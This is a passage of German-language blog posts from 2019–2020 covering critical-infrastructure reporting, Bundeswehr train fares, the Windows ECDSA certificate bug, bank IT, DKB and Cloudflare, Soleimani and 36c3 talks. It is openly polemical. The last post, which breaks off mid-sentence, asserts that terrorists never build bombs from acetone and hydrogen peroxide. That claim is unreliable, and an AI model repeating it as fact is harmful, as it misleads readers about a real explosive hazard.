Ich persönlich sehe daher die Meldepflichten der Kritis-Unternehmen sehr kritisch, weil das eben nicht alles sofort veröffentlicht wird. Dann könnte ich damit leben. Aber so? So ist das doch geradezu der Prototyp von privilegierten Informationen, an denen die Amerikaner mit GANZ großer Sicherheit genug Interesse haben, um da voll im Bild zu sein, wo die Schwachstellen ihrer "Verbündeten" liegen. Es ist mir unbegreiflich, wieso die Kritis-Firmen das einfach so schlucken. Immerhin reden wir hier von dem Land, das als erstes und bisher einziges im Ausland Cyberwar durchgeführt hat, mit dem Ziel Dinge kaputtzumachen. Im Iran. Stuxnet. Ihr hörtet vielleicht davon.
Es ist mir auch unbegreiflich, wieso die Kritis-Unternehmen diesen Scheiß nicht selbst geregelt kriegen! Stattdessen fahren die alle Windows und Outlook und Active Directory und wundern sich dann über Emotet und Eternalblue. Patchen hält niemand für nötig.
Ja und dann weiß ich auch nicht. Vielleicht ist das ja einfach Schicksal. Vielleicht haben wir den Untergang einfach verdient. Das ist der Totmannschalter der Evolution. Wenn die Spezies zu mächtig wird, richtet sie sich durch technische Inkompetenz selber zugrunde.
[l] Kennt ihr das Konzept der Giftpille? Wenn eine Firma nicht gekauft werden will, dann tut sie einen Passus in ihre Verträge, der in dem Fall massiv negativ für den Käufer wäre. Manchmal gibt es das auch als Abschiedsgeschenk von einem Stänkerer. der verhandelt noch kurz ein paar wirklich beschissene Verträge im Namen der Firma und dann geht er und guckt zu, wie der Laden absäuft.
Eine Giftpille im 2. Wort sinn haben die Briten der EU hinterlassen.
Universities and Science Minister Chris Skidmore has said that the UK will not implement the EU Copyright Directive after the country leaves the EU. [...] The UK was among 19 nations that initially supported the law. That was in its final European Council vote in April 2019.
Das riecht ein bisschen wie das alte Bankenmodell. Die Banken sitzen in UK und vergiften die EU. Wenn UK austritt, sind die Banken nicht mehr Teil des Binnenmarktes und können nicht mehr so gut alles kaputtspekulieren. Das Internet lässt sich aber nicht so leicht aus dem Binnenmarkt herausschneiden. Die EU ist ja in Sachen Hardware schon aus dem Spiel, in Sachen Software bis auf SAP nicht wirklich konkurrenzfähig, und mit dieser Direktive werden die Briten dann für ihre transatlantischen Freunde auch für Dienste und Plattformen im Internet den Nagel in den Sarg geschlagen haben.
Gute Arbeit, liebe EU!
Ich würde übrigens bei dieser Gelegenheit gerne diesen Blogpost aus dem Jahre 2010 nochmal zur Lektüre empfehlen. Diese Perspektive sollte man auch für das "Leistungsschutzrecht" immer im Hinterkopf behalten. wohlgemerkt: Die Verleger fuhren mit goldenen Droschken herum, nicht die Autoren.
Update: Das ehemalige Nachrichtenmagazin hat seit dem alten Blogpost ein paar Mal ihre Site relaunched und dabei Links kaputtgemacht. Der hier geht.
Update: Hier ist ein gut passender Tweet von Boris Johnson dazu. Mit dieser wunderbaren Reaktion :-)
[l] Aus der beliebten Serie "gut, dass das bloß ein Waffennarr und kein Terrorist war", heute: 19-jähriger Waffennarr erschießt Familie.
Unerwartete Wendung im Fall der erschossenen Familie in Starnberg: Die Polizei geht von Mord aus und hat zwei Männer festgenommen.
Wie, was dachten die denn, was das ist, wenn eine ganze Familie erschossen wird? Ein Unwetter? Ein bedauerliches Missverständnis?!
"Also SO einen schlimmen Fall von Selbstmord hatten wir aber schon lange nicht mehr", sagte der Sheriff über den Mann mit 20 Messerstichen im Rücken?
In der 2. Meldung zu dem Fall ist dann immerhin nicht mehr von "Waffennarr" die Rede. Dafür haben sie anscheinend neben den Maschinengewehren auch noch Chemikalien zur Sprengstoffherstellung gefunden. Der 19jährige Täter ist geständig.
Das mit den Waffen ist wohl nicht so krass wie es initial aussah, denn die meisten davon waren untauglich gemachte Ausstellungsstücke.

Fri Jan 24 2020

[l] Ist euch aufgefallen, dass in letzter Zeit die Züge alle voll sind, und auffallend viele Fahrgäste Flecktarn tragen?
Dafür gibt es eine ganz einfache Erklärung: AKK musste beim Handeln gesehen werden, hatte aber nichts von Substanz vorzutragen, also hat sie sich entschieden, einfach Geld von der einen Tasche in die andere zu schieben, und das dann dem Steuerzahler als Vorteil zu verkaufen.
Alle privaten Bahnfahrten in Uniform sind für die Soldatinnen und Soldaten kostenfrei. Dabei ist es ganz egal, ob vom Dienstort nach Hause oder rein privat gereist wird – und das in allen zugelassenen Uniformen.
Warum würde man so eine Regelung überhaupt machen?
Na, äh, ... das ist eine Werbemaßnahme!
Ziel des kostenfreien Bahnfahrens ist es, die Sichtbarkeit von Soldatinnen und Soldaten der Bundeswehr in der Öffentlichkeit zu erhöhen. Sie sollen besser als Teil der Gesellschaft erkennbar sein.
Es soll sich wieder normal anführen, dass Soldaten durchs Land fahren. Als Vorbereitung für Bundeswehreinsätze im Inneren, würde ich mal vermuten.
Der eine oder andere von euch hat vielleicht eine eigene Firma, und hat darüber nachgedacht, seinen Mitarbeitern die Bahntickets zu zahlen. Man will ja was für das Klima tun und so weiter. Wenn ihr das versucht habt, dann wird euch aufgefallen sein, dass das als geldwerter Vorteil gilt und dann extra versteuert werden muss.
Das betrifft natürlich auch die Bundeswehr. Aber keine Sorgen, da mauscheln wir mal eben was. Alle Menschen sind gleich, aber die Bundeswehr ist gleicher.
„Es wird keine Nachteile für unsere Soldatinnen und Soldaten geben“, sagt Staatssekretär Gerd Hoofe. Die kostenfreie Bahnfahrt gilt zwar als geldwerter Vorteil, die Steuern dafür werden aber pauschal vom Verteidigungsministerium entrichtet.
Wartet, wird noch heftiger. Was ist denn mit der Pendlerpauschale, die man bisher steuerlich geltend machen kann? Die kann man ja nicht mehr geltend machen, wenn jemand anderes das Ticket zahlt, oder? Keine Sorge! Auch da hat AKK auf dem kurzen Dienstweg was gemauschelt!
Die Vereinbarung mit den Finanzbehörden sieht weiter vor, dass die Pendlerpauschale für die Fahrkosten zwischen Wohnung und Arbeitsstätte wie bisher geltend gemacht werden kann.
Ja aber klar! Komm, zu dem Stinkefinger gibt es direkt noch den anderen Stinkefinger.
[l] Habt ihr euch auch solche Sorgen um Sigmar Gabriel gemacht?
Was soll jetzt aus dem werden, wo die SPD ihren Absturz unter 5% fast vollendet hat?
Keine Sorge. Sigmar Gabriel wird jetzt Aufsichtsrat der Deutschen Bank.
Da wächst zusammen, was zerschlagen gehört!

Thu Jan 23 2020

[l] Die Bahn hat ein kleines Boo-Boo gemacht.
Auf der eingleisigen Strecke zwischen Garmisch-Partenkirchen und Reutte sind am Mittwoch gegen 17 Uhr zwei Regionalzüge unvermittelt gegenüber gestanden.
[...]
Der Lokführer des mit etwa 60 Kilometer pro Stunde fahrenden Zuges bemerkte, dass sich auf der eingleisigen Strecke bereits ein anderes Schienenfahrzeug befand und bremste sogleich.
Lasst euch das mal auf der Zunge zergehen.
Nicht die Technik hat den Zusammenstoß verhindert. Sondern der eine Zugfahrer hat gemerkt, dass da schon jemand auf dem Gleisabschnitt war.
Heilige Scheiße. (Danke, Walter)
[l] Benutzt hier jemand Apple-Geräte?
Habt ihr die gekauft, weil Apple mit ihrem Trackingschutz Werbung gemacht hat?
Dann habe ich schlechte Nachrichten für euch. Der funktioniert nicht nur nicht, der ist kontraproduktiv.
Apple erinnert langsam so ein bisschen an Intel. Da sind ja auch alle Innovationen der letzten Jahre nach hinten losgegangen.

Wed Jan 22 2020

[l] Benutzt hier jemand Windows? Und Office? Und einen Browser?
Und hat sich Sorgen gemacht, dass Microsoft in letzter Zeit so wenig versucht hat, ihren Usern unter illegaler Ausnutzung ihres Monopols ihre unterperformenden Ranztechnologien überzuhelfen, ob sie wollen oder nicht?
Gut, in Sachen erzwungene Windows-Updates und endlosem Rumgenerve, man möge Windows 10 installieren, war Microsoft eher nicht zurückhaltend. Aber es gab schon länger kein DU WIRST JETZT INTERNET EXPLORER BENUTZEN!!1! mehr.
Keine Sorge. Das Warten ist vorbei. Microsoft installiert jetzt allen Office 365-Usern ungefragt und ungebeten eine Chrome-Extension, die die Suchmaschine zu Bing umstellt.
Ach komm, Fefe, ich verwende Firefox, das betrifft mich nicht!
Support for the Firefox web browser is planned for a later date.
Ach komm, Fefe, das ist doch nur die englische Seite, sowas würden die sich in der EU nie trauen!
At this time, the extension will only be installed on devices in the following locations, based on the IP address of the device:
- Australia
- Canada
- France
- Germany
- India
- United Kingdom
- United States
Doch, würden sie!
Es ist allerhöchste Zeit, dass die EU diese Firma mal in ganz kleine Teile zertrümmert. Alternativ müsste einfach ein Gericht urteilen, dass man denen die Arbeitszeit für das Rückgängigmachen in Rechnung stellen kann. Dann könnte ich damit auch gut leben.

Wed Jan 15 2020

[l] Zu der Windows-Kryptokalypse sind immer noch nicht alle Details auf dem Tisch, aber es gibt eine Analyse von Thomas Ptacek, der sich in dem Bereich ein bisschen auskennt. Und es gibt diese Materialsammlung. Die Analyse von Ptacek ist aber die einzige brauchbare, die ich gesehen habe.
Es gibt mehrere interessante Aspekte an der ganzen Sache.
Erstens: Der Code sah sauber aus. Das war ein Logik-Bug. Der Code sah richtig aus. Man musste wirklich die Materie verstanden haben, um zu verstehen, dass es da ein Problem gibt. Kudos an die NSA, dass sie das überhaupt gesehen haben.
Zweitens: Es hieß initial, der Bug ginge 20 Jahre oder so zurück. Das stimmt wohl doch nicht. Der Bug wurde 2015 eingebaut. Das finde ich ja nun wieder hochinteressant. Denn wir reden hier von ECDSA. ECDSA war damals schon angeschossen, weil es so fragil ist, und es so einfach ist, damit einen Totalschaden zu produzieren. Die Playstation war über ihr DSA gehackt worden. djb hatte bereits mit explizitem Hinweis auf die Fragilität von ECDSA und den NIST-Kurven seinen Gegenvorschlag Ed25519 publiziert. Und unter diesen Umständen haben die den Code nochmal angefasst und ihn schlimmer gemacht. Dazu muss man wissen, dass Krypto-Code so der am wenigsten volatile Code überhaupt ist. Alle sind sich bewusst, wie kritisch da jedes Bit und jeder CPU-Zyklus ist, und keiner will da irgendwas anfassen. Das ist auch bei Microsoft so. Insofern wollte ich das alles erstmal gar nicht glauben. Allerdings gibt es einen Grund, doch den Krypto-Code anzufassen, nämlich wenn sich die Spec ändert, oder man noch einen Aspekt aus der Spec implementieren muss, den man vorher nicht supported hat.
In diesem Fall war das das Feature, dass im Handshake die Kurvenparameter übertragen werden, und nicht bloß die paar hart eingebrannten NIST-Kurven verwendet werden können.
So und jetzt kommt der echt peinliche Teil. Hier ist die Spec. Die sagt ausdrücklich:
implicitCurve and specifiedCurve MUST NOT be used in PKIX
und
specifiedCurve, which is of type SpecifiedECDomain type (defined in [X9.62]), allows all of the elliptic curve domain parameters to be explicitly specified. This choice MUST NOT be used.
Verschwörungstheoretiker wären jetzt vielleicht geneigt, hier von einer Bugdoor zu sprechen, also eine Backdoor, die wie ein Versehen aussieht.
Bleibt die Frage, wieso die NSA das publik macht. Den einen Grund dafür kann man gerade gut beobachten. Die lassen sich als Helden feiern. Zum ersten Mal in ihrer Geschichte haben sie etwas Positives gemacht. Und einige Deppen glauben ihnen jetzt vielleicht sogar ihr Blablah, dass sie eine neue Seite aufschlagen wollen und ab jetzt wichtige Lücken nicht ausnutzen sondern melden wollen. Das ist natürlich absurd.
Ich glaube ja, die NSA hat das gemeldet, weil ihr eigener Arsch gefährdet war. Die NSA hat nämlich in den USA eine Doppelrolle und erledigt auch den Teil mit, den bei uns das BSI separat macht. Die schreiben die Anforderungsdefinitionen für Militär und Behörden. Und da haben sie reingeschrieben, dass Elliptische Kurven total geil und sicher sind, als bei uns noch Rüdi auf dem Congress gewettert hat, was das für eine unbewiesene spekulative Voodoo-Technologie sei, und dass man lieber bei RSA bleiben soll. Die haben sich damals ziemlich fett auf elliptische Kurven committed, und das Militär ist ihren Empfehlungen gefolgt. Microsoft hat Support für elliptische Kurven überhaupt nur eingebaut, soweit ich weiß, weil die NSA das den Behörden in die Anforderungen geschrieben hatte, und Microsoft gerne weiter Behörden beliefern können wollte.
Wenn jetzt also rauskommt, dass es einen Bug gibt, in einem von der NSA empfohlenen "sicheren" System, das der inhärenten Fragilität des Systems geschuldet ist, dann beschädigt das den Ruf der NSA.
Übrigens, bei solchen Bugs müsst ihr immer einen Spruch im Hinterkopf behalten: Wenn schon das A-Team solche Fehler hat, wie sieht dann erst der Code des B-Teams aus?
Ich behaupte daher: Das Verhalten der NSA ist ohne plötzlich aufkeimenden Altruismus zu erklären.

Mon Jan 13 2020

[l] Leserbrief aus der Bankenbranche:
ich hänge seit mehr als 20 Jahren als Externer bei verschiedensten Banken herum. Ich habe sie im wesentlichen alle gesehen. Große, kleine mit eigener IT, mit IT von Dienstleistern und die übliche Mischung. Was Du schreibst ist völlig richtig und dem geneigten Leser sei gesagt, es ist noch viel schlimmer als man es sich von außen vorstellt. Eine Bank betreibt hunderte oder gar tausende von verschiedenen Systemen. Eins erstellt Reports für die Aufsicht über das Eigenkapital, andere für den Jahresabschluss, dann gibt es noch welche die verschieden Risikokennzahlen ermitteln, welche die über die Kredite laufen und Gebühren berechnen, welche die Auswertungen für die Kundenansprache erstellen, andere wiederum die Zahlungen verwalten und weiterleiten, Systeme die in der Wertpapierabwicklung Bestätigungen versenden uswusf. Und das war nur das Backoffice. Im Frontoffice Handelssysteme mit denen man an den verschiedensten Wertpapiermärkten handeln kann, Kassensysteme, ach ja und natürlich Verwaltungssysteme für Geldautomaten, die Geldautomaten selbst (sind ja im Prinzip auch nur Windows PCs), Kassensysteme für die Schalter, Systeme für die Kundenberatung für Immobilienkredite, Unternehmenskredite, Anlageberatung und schlussendlich natürlich die üblichen PCs für die Angestellten mit Office, Mail, einem Browser mit denen sie auf die vorher genannten Systeme zugreifen können.
Und alles das ist alt. Alt nicht wie das Smartphone von vor zwei Jahren, sondern alt wie das allererste iPhone verglichen mit aktuellen Smartphones. Da sind Systeme die aus einem C++ Kern bestehen um den man Java herumgebaut hat und das jetzt in eine virtualisierte Hadoop Umgebung „integriert“ wurde. Alle Entscheidungen die zu so einem Müll geführt haben sind individuell sinnvoll gewesen. Man konnte kein Blech bestellen (Vorstand hat ausgegeben nur noch virtuelle Server), Java weil man keine anderen Entwickler kurzfristig bekommen hat, hadoop weil ja jetzt alles in der Cloud (private) laufen muss. Oder anderes Beispiel, Man hat einen Dienstleister schuften lassen mit der Karotte vor der Nase dann den ganzen Konzern umzustellen. Das ist dann gescheitert weil Oracle für die Tochter die das Geschäft übernehmen sollte nicht anerkannt hat das die Enterprise Lizenz der Mutter auch da gilt. Kosten in 7 stelliger Höhe, Business Case im Eimer. Alternative und auch zertifiziert wäre SQLServer 2016 gewesen. Das war dann aber 2018 zu neu gewesen für die Bank und man ist beim alten Dienstleister geblieben, frag nicht was der neue der sehr viel umsonst gemacht hat davon hält.
Oder die Desktops der Mitarbeiter. Thin Clients waren der heiße Scheiß. Schade nur das über Citrix o.ä, Video in Skype for Business und Telefonier nicht ganz einfach ist. Wird also abgeschaltet bis man das im Griff hat, dauert üblicherweise Jahre. Oder Lokale PCs aber Applikationen nur über Citrix gestreamt. Alt-Tab funktioniert nur zufällig. Die Applikationen werden aus einem Portal aufgerufen das natürlich nur sauber in IE11 läuft. Dafür gehen immer mehr externe Seiten mit Windows 7 und IE11 nicht mehr weil die Cypher die der Server anfordert schlicht in Win7 nicht existieren. Windows 10 muss man mit viel Aufwand optisch so umbürsten das es Windows 7 möglichst ähnlich sieht weil man kein Geld für Mitarbeiterschulungen ausgeben will und Angst vor den Supportcalls hat. Open Source Software ist grundsätzlich böse, weil man da ja keinen Herstellersupport bekommt, selbst für Tools in der IT und selbst installieren geht ja nicht, Sicherheit und so. Und wenn dann mal ein Tool wie Putty verfügbar ist (ist halt kostenlos) dann ist es üblicherweise Jahre alt. Aktuelle Sicherheitslücken kurzfristig patchen? Da will ja keiner Owner der Applikation sein…
Und das ganze noch gewürzt mit Dienstleistern/Outsourcern/Hostern deren erstes, wichtigstes und in vielen Fällen einziges hervorstechendes Merkmal war der billigste zu sein.
Ja nicht bei jeder Bank trifft alles das zu und in den letzten Jahren hat sich an einigen Stellen etwas getan. Aber tatsächlich ist man dann dort nicht mehr 10 Jahre zurück, sondern nur noch 5. Bis mitte der 2000 Jahre hatte der durchschnittliche Arbeitnehmer am Arbeitsplatz noch die bessere Ausstattung als zu hause. Heute ist der durchschnittliche Anwender privat bei weitem besser ausgestattet als am Arbeitsplatz. Für die meisten Banken wäre Office 365 sowohl was security als auch safety, wie auch Benutzerfreundlichkeit und Effizienz ein Segen. Ich war auch lange dagegen, habe meine Meinung aber aufgrund der bitteren Realität mittlerweile geändert. Die Banken und Ihre Dienstleister können es schlicht nicht, haben nie begriffen das die IT ihre eigentliche Produktion ist und deshalb das Thema vernachlässigt. Heute besteht die einzige Chance fürs Überleben in der Cloud. Bitter aber wahr.
[...] Banken-IT ist ein liederlicher, alter zum Teil uralter Haufen Scheiße der über Jahrzehnte zusammengeflickt wurde und nur weil sich einige Mitarbeiter den Arsch aufreißen noch halbwegs stabil läuft. Ohne Mitarbeiter die manuell eingreifen, würde eine Bank innerhalb weniger Stunden komplett stillstehen.
Der Vergleich mit Fintechs ist unfair, da die erst vor ein paar Jahren auf der grünen Wiese angefangen haben -> keine Altlasten. Die haben andere Probleme
Da müsste man ja eigentlich auch mal ein bisschen Grundlagenforschung machen, wie die Fintechs es schaffen, bei so einer unfassbaren Steilvorlage an fossilen Krusten bei der Konkurrent, NOCH schlechter zu sein.

Sun Jan 12 2020

[l] Ungefähr zwei Dutzend Leute haben mich darauf hingewiesen, dass die DKB offenbar auf ihren "Hackerangriff" reagiert hat, indem sie Cloudflare vorgeschaltet haben.
Das hat ein offensichtliches Problem: Cloudflare kann jetzt den entschlüsselten Traffic sehen, inklusive eure Kontostände und Überweisungen, wenn ihr euch da einloggt und Überweisungen tätigt.
Cloudflare hat in den letzten Jahren vor allem durch Inkompetenz und Ausfälle auf sich aufmerksam gemacht, und darauf, dass sie so verzweifelt "Kunden" brauchten, dass sie ihre Dienste verschenkt haben, um ihren Investoren mehr "Conversions" zeigen zu können. Gewinn haben die glaube ich noch nicht gemacht, das ist wie Uber eine Verbrennungsmaschine für Investorenkohle. In Expertenkreisen werden die gerne als Clownflare verspottet.
Außerdem ist das eine US-Firma. Und es ist bekannt, dass die US-Regierung sehr an Kontoinformationen ausländischer Bürger interessiert sind. Mit solchen illegal erlangten Daten haben sie gegen die Schweiz ein Exempel statuiert, wenn ihr euch erinnert.
Das ist alles ein perfekter Sturm. Wieso sitze ich also seit mehreren Tagen auf der Meldung?
Weil die Lage nicht so einfach ist. Meine Anforderungen an meine Bank sind völlig klar. Ich möchte, dass die höhere Security-Anforderungen haben, dass die ihren Scheiß nicht in der Cloud haben sondern selber hosten, dass das ein ordentliches Rechenzentrum mit ordentlichen Betreibern ist, und mit physischer Security, und dass meine Kontodaten da sicher liegen.
Das Problem bei dem Bild ist, dass Banken keine Hosting-Experten sind. Die können auch nicht mit Geld umgehen, daher werfen Banken üblicherweise mit hanebüchenen Geldsäcken auf das Problem, was aber meiner Beobachtung nach nicht dazu führt, dass die die beste Leistung kriegen, sondern dass sie die krassesten Blender und Abzocker als Dienstleister kriegen.
Dazu kommt, dass das Umfeld ein Morast aus Compliance-Scheiß und einer inkompetenten, freidrehenden Regulierungsbehörde ist, die (aus meiner Warte gesehen) an einem Stück völlig hilflos sinnlose Maßnahmen verhängt. Dazu kommt, dass es je nach Bank und Zusammenschluss (z.B. die Landesbanken oder die Sparkassen) nochmal separate Regularien gibt. Da blickt niemand mehr durch. Am Ende hat man da einen riesigen Apparat, der sich so Passierschein-A38-mäßig selbst mit Alzheimer-Prävention in Form von sinnloser Beschäftigung im Kreis beschäftigt.
Die Situation ist daher regelmäßig so, dass der Scheiß in der Cloud sogar besser implementiert und kompetenter administriert wird.
Wer also wie ich Wert darauf legt, dass seine Bank den Scheiß nicht in die Cloud geschoben hat, der wird wahrscheinlich nicht eine superkompetente Bank kriegen, die ihren Kram im Griff hat, sondern einen Moloch aus Abhängigkeiten, der eigentlich schon vor fünf Jahren in die Cloud gesollt hätte, aber sie haben es nicht geschafft.
Ich verallgemeine hier natürlich schamlos.
Aber eine Frage könnt ihr euch ja mal direkt stellen: Wieso hat die Regulierungsbehörde der DKB nach der Cloudflare-Nummer nicht direkt die Lizenz entzogen? Das kann doch nur heißen, dass sie entweder nichts taugt, weil sie zu lahmarschig ist, oder sie taugt nichts, weil sowas nicht verhindert. Das heißt aber im Umkehrschluss, dass deren Regulierung sicher auch nicht dazu geführt haben wird, dass bei den anderen Banken die Rechenzentren ordentlich betrieben werden.
Denkt mal drüber nach.
Ich weiß aus gut informierter Quelle, dass die Bafin (die Regulierungsbehörde) keine grundsätzlichen Einwände gegen Cloud-Migrationen hat. Also nicht nur Cloudflare vorschalten sondern richtig komplett in die Cloud ziehen. Wozu haben wir eigentlich eine Regulierungsbehörde, wenn die das nicht verhindert?
Anders herum gefragt: Was ist eigentlich der fundamentale Unterschied zwischen Cloud und "eigenem RZ"? Das ist im Allgemeinen nämlich kein eigenes RZ sondern das betreibt irgendein Zulieferer. Ist das nicht dasselbe in grün?
Ja aber Fefe, die sitzen doch in Deutschland und unterliegen unseren strengen Gesetzen und Regulierungen!!1! Ja das haben wir ja gerade live gesehen, wie hilfreich unsere strengen Gesetze und Regulierungen sind. Keine weiteren Fragen.
Ich habe mich über die Jahre mit vielen Kunden über die Cloud unterhalten, und da die hanebüchsten Geschichten gehört. Die Ausrede ist immer dieselbe. Schlimmer als was wir jetzt haben kann das auch nicht sein. Ein Kunde formulierte das mal so: Amazon antwortet wenigstens auf unsere Trouble Tickets.
Insofern, kurz gesagt: Das Gedankenmodell, das euch dazu bringt, die Cloudflare-Nummer negativ zu bewerten, fußt auf völlig falschen Annahmen über die Industrie. Ihr habt zwar völlig recht, dass das Scheiße ist, aber ihr habt ja gar keine Vorstellung davon, wie Scheiße der Normalzustand in der Branche ist. Dabei ist gerade erst live und in Farbe die PSD2-Apokalypse an euch vorbeigescrollt. Aber irgendwie nimmt das niemand als Anlass, mal sein Gedankenmodell zur Bankeninfrastruktur zu überdenken.

Tue Jan 7 2020

[l] Es gibt einen heißen Second-Hand-Markt für ... Traktoren.
Die Hersteller haben die neuen Modelle unreparierbar gemacht und bis zur Unbrauchbarkeit mit DRM-Scheiß zugestopft, also versuchen die Farmer händeringend alte Geräte auf Auktionen zu ergattern.

Sat Jan 4 2020

[l] Zu dem iranischen General sind ein paar Hintergründe interessant.
Die englische Wikipedia hat Details zu ihm. Ich fasse mal zusammen:
- Hat Saddam Hussein bekämpft, der ja nach US-Sicht Terrorist war. Damals war er noch US-Verbündeter, aber das ändert ja nichts.
- Hat sich einen Namen als Drogenschmuggler-Bekämpfer gemacht. Das tun die Amis ja auch.
- Hat mit den Amis zusammen die Taliban bekämpft nach 9/11.
- War gerade im Irak, um mit den Locals den Kampf gegen ISIS zu koordinieren.
Aus dieser Perspektive ist nicht mehr so klar, wieso der jetzt sterben musste. Der Mann hat ja mehr für die USA getan als gegen sie. Man könnte sogar sagen, der Trump hat einem Verbündeten in den Rücken gedolcht. Genau wie Bush Senior dem damaligen Verbündeten Saddam Hussein in den Rücken gedolcht hat. Das hat Tradition.
War das jetzt ein guter Mensch, ein Unschuldiger? Nein. Er hat auch die Hisbollah geleitet oder war zuständig (die genauen Details sind unklar). Er hat wohl in einem Interview gesagt, er habe 2006 im Israel-Hisbollah-Krieg die Hisbollah-Seite für den Iran geleitet.
Wenn man die Pro-Israel-Fraktion liest (Vorsicht: Die Achse des Guten ist eine Partisanen-Site), dann hat hier das Gute über Hitlers Statthalter gesiegt und den Judenstaat vor der direkt bevorstehenden Vernichtung gerettet. Das finde ich zu einfach, denn aktuell hat der eben nicht Israel bekämpft sondern ISIS, die Israel auch bekämpft. Hier eine Notwehrsituation zu konstruieren finde ich daher eher weit hergeholt.
Unter dem Strich war das aber natürlich kein Freund Israels. Vermutlich sogar ein krasser Antisemit. Das wäre aber eher eine Ausrede für Israel, wenn die den umgelegt hätten, nicht für die USA.
Dann könnte man noch argumentieren, hey, ist halt Krieg, da sterben Kombattanten. Die USA haben aber dem Iran m.W. keinen Krieg erklärt. Damit ist das eher ein Terroranschlag als eine Kriegshandlung.
Bleibt noch eine Theorie: Dass das Burying war. Trump hat mal eben jemandem ermordet, um von seinen innenpolitischen Problemen abzulenken. Das hat leider auch Tradition. Und bei Trump erinnert es an seine Wahlkampf-Äußerung, er könne auf der 5th Avenue in New York auf offener Straße jemandem erschießen und würde keine Wähler verlieren. Später sein Anwalt, er könnte auch nicht dafür strafrechtlich verfolgt werden.

Mon Dec 30 2019

[l] Ich hatte mich vorhin noch kurz mit David Kriesel unterhalten, ob ihm was einfällt, wie man schön Medienkompetenztraining dazu machen könnte, wie leicht man Muster aus Daten "erkennen" kann, wo gar keine sind.
Da meinte er, hey, das hab ich doch schon gemacht. Und die URL zum Video mit Zeitpunkt hat er mir auch geschickt. Hatte ich schon wieder vergessen, dabei saß ich ja da auch drin in dem Vortrag!
Ich halte das für eine der Kernkompetenzen der Zukunft, dass man zu beurteilen lernt, auf wie festen Füßen eine auf Statistik beruhende Aussage tatsächlich ist. Danke an David für den Link und falls jemand von euch tolle Ideen hat, wie man das trainieren kann, dann bitte ich um eine kurze Mail!

Sun Dec 29 2019

[l] Ich habe eine Menge positives Feedback zu meinen Vortragsempfehlungen gekriegt. Das habe ich unterschätzt, wie viele Leute sich darüber freuen. Wenn ich das gewusst hätte, hätte ich da mehr von gemacht und das früher gepostet. Gleich mal notieren als Vorsatz für 2020 :-)
Heute morgen war ich zu spät dran und hab daher nicht mal mehr versucht, in den OpenBSD-Vortrag zu kommen. Den werde ich mir aber definitiv auf Video angucken.
Daher war mein erster Vortrag die Affäre Hannibal, von zwei taz-Journalisten, die da die Recherchen gemacht haben. Der Vortrag hat jetzt nicht so viele Neuigkeiten gebracht, wenn man der Story schon gefolgt ist, aber lohnt sich als Überblick trotzdem. Der Vortrag brachte mich auf die Idee für ein paar Medienkompetenzübungen. Man könnte z.B. mal ein Experiment machen, wie leicht es ist, aus zufälligem Rauschen Muster zu erkennen. Und das zweite Experiment wäre, mit der üblichen Rhetorik (in dem Talk hieß es sinngemäß, die hätten sich ja dezentral verwaltet und hätten sich nur unter Pseudonym gekannt teilweise; das ist beim CCC genau so!), die man so gegen die Nazis verwendet, um es gefährlich klingen zu lassen, über eine Organisation redet, in der man selbst Mitglied ist. Nur um mal zu merken, wie schnell sich ein gefährlich klingendes Narrativ konstruieren lässt. In diesem Fall gab es tatsächliche Dinge, auf denen das fußte, versteht mich nicht falsch. Verstoß gegen das Kriegswaffenkontrollgesetz, gestohlene Bundeswehrwaffen und -Munition, etc. Die hatten Listen vonn Leuten, die sie nicht mochten, und man nimmt jetzt an, dass das eine Todesschwadron-Zielliste war. Das klingt auch für mich so. Auf der anderen pflegt fast jeder Twitter-Teilnehmer eine Liste von Leuten, die er nicht mag, und bei vielen ist die inhaltliche Rhetorik auch in eine Richtung, bei der man als neutraler Rechtsstaat eine Tötungsabsicht unterstellen könnte.
Der taz-Vortrag hielt sich aber mit krasser Rhetorik sehr zurück, das will ich hier ausdrücklich loben. Das Phänomen meine ich allgemein, nicht konkret auf den taz-Talk bezogen.
Der nächste Vortrag war ein Rückblick vom Peng-Kollektiv, der auch sehr empfehlenswert war. Das war nicht nur ein Jahresrückblick sondern ging länger zurück.
Der nächste Vortrag wird für mich über Finfisher sein, das machen ths und Ulf, das wird bestimmt lustig. Danach natürlich djb und Tanja in Saal 2 (ja, dafür lasse ich sogar eine Snowden-Liveschalte ausfallen). Danach kommt mein Kumpel Ilja mit seinem Kollegen Joseph und erzählt über Bootloader, das wird ein ganz großes Blutbad. Danach mache ich glaube ich ein bisschen Pause und gucke mir abends vielleicht noch das Schimpfwörterbuch an.
So langsam setzt dann auch eine gewisse Ermüdung ein, man wird halt auch nicht jünger :-)

Sat Dec 28 2019

[l] So, liebe Leser, Tag 2 vom 36c3. Ich bin schon nach Empfehlungen gefragt worden, aber weil ich heute ja selber dran bin mit meinem Vortrag bin ich da noch nicht so in das Vortragsprogramm vorgedrungen.
Was ich aber auf jeden Fall ungesehen empfehlen kann ist Ross Anderson in Saal 1 um Sieben. Der Mann ist eine Legende und jeder sollte mal einen seiner Vorträge erlebt habe. Ich hoffe, dass der immer noch mit OH-Projektor und handgemalten Folien vorträgt :-)
Der Vortrag davor klingt auch sehr gut, finde ich, aber da weiß ich auch nur was in der Ankündigung steht.
Ich werde jetzt noch ein bisschen an meinem Vortrag herumoptimieren.

Mon Dec 23 2019

[l] Genossen, wir haben grandiose Fortschritte mit unserem Digitalisierungsprojekt gemacht:
Bis Jahresende sollten Streifenpolizisten in Thüringen mit Smartphones versorgt werden.
Unser nächstes Fünfjahresplan steht auch schon fest. Da sollen die Polizisten mit Schuhen und Jacken ausgestattet werden!1!!
[l] Unser täglich Geheimdienst-Propaganda gib uns heute! Und leg zur Feier des Tages noch eine Familienpackung BKA-Propaganda drauf!
Ich bleibe ja lieber bei den Fakten. Und die Fakten sind ziemlich klar. Die Kriminalität ist seit Jahren rückläufig, der Terrorismus spielt so gut wie keine Rolle in Deutschland, und die paar Terroranschläge, die durchkommen, bei denen waren immer die Täter seit Längerem unter Beobachtung durch die Polizei oder gar Beziehungen zu den Geheimdiensten.
Oh und aus Aceton und Wasserstoffperoxid baut kein Terrorist eine Bombe. Wer das versucht, jagt sich bloß selbst in die Luft. Ich hatte das vor Jahren schonmal im Blog. Das Zeug ist so empfindlich, dass wenn du das in einer Flasche zubereitest, und es dir dabei noch nicht explodiert ist, was eher unwahrscheinlich ist, du die nicht auf- oder zuschrauben kannst, ohne eine Explosion auszulösen. Oh und wenn du die Flasche nicht zugemacht hast, verliert das Zeug alle 24h 6,5% Masse durch Sublimation. Wikipedia fasst das Handling so zusammen:
